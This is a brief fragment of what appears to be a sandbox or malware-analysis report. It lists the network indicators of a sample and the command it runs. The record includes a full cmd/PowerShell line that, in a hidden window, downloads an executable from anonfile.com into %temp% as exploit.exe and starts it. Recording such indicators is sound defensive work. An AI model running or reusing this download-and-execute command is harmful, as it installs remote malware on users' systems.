Technical Information
- https://cdn-08.anonfile.com/5971r2pcoe/eb1862b3-1587024824/test.exe as %temp%\exploit.exe
- %TEMP%\exploit.exe
- 'cd####.anonfile.com':443
- 'an###ile.com':443
- DNS ASK cd####.anonfile.com
- DNS ASK an###ile.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://cdn-08.anonfile.com/5971R2pcoe/eb1862b3-1587024824/test.exe','%temp%\exploit.exe');Start-Process '%...